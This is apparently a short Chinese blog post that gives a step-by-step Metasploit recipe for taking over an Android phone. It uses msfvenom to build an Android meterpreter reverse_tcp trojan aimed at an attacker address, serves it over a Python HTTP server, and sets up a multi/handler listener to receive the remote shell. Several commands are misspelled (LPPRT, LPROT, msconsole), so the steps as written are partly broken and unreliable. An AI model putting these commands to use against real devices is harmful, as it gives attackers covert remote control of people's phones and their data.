MSF 入侵安卓手机
- 生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.135.247 LPPRT=5555
- 进行文件传输: python3 -m http.server
- 启动 MSF 控制端 : msconsole
- 设置模块: use exploit/multi/handler
- 设置payload: set payload android/meterpreter/reverse_tcp
- 查看配置: show options
- 设定监听地址: set LHOST 192.168.135.247
- 设定端口:set LPROT 5555
- 运行: exploit
本文来自博客园,作者:ZapcoMan,转载请注明原文链接:https://www.cnblogs.com/ZapcoMan/p/18454978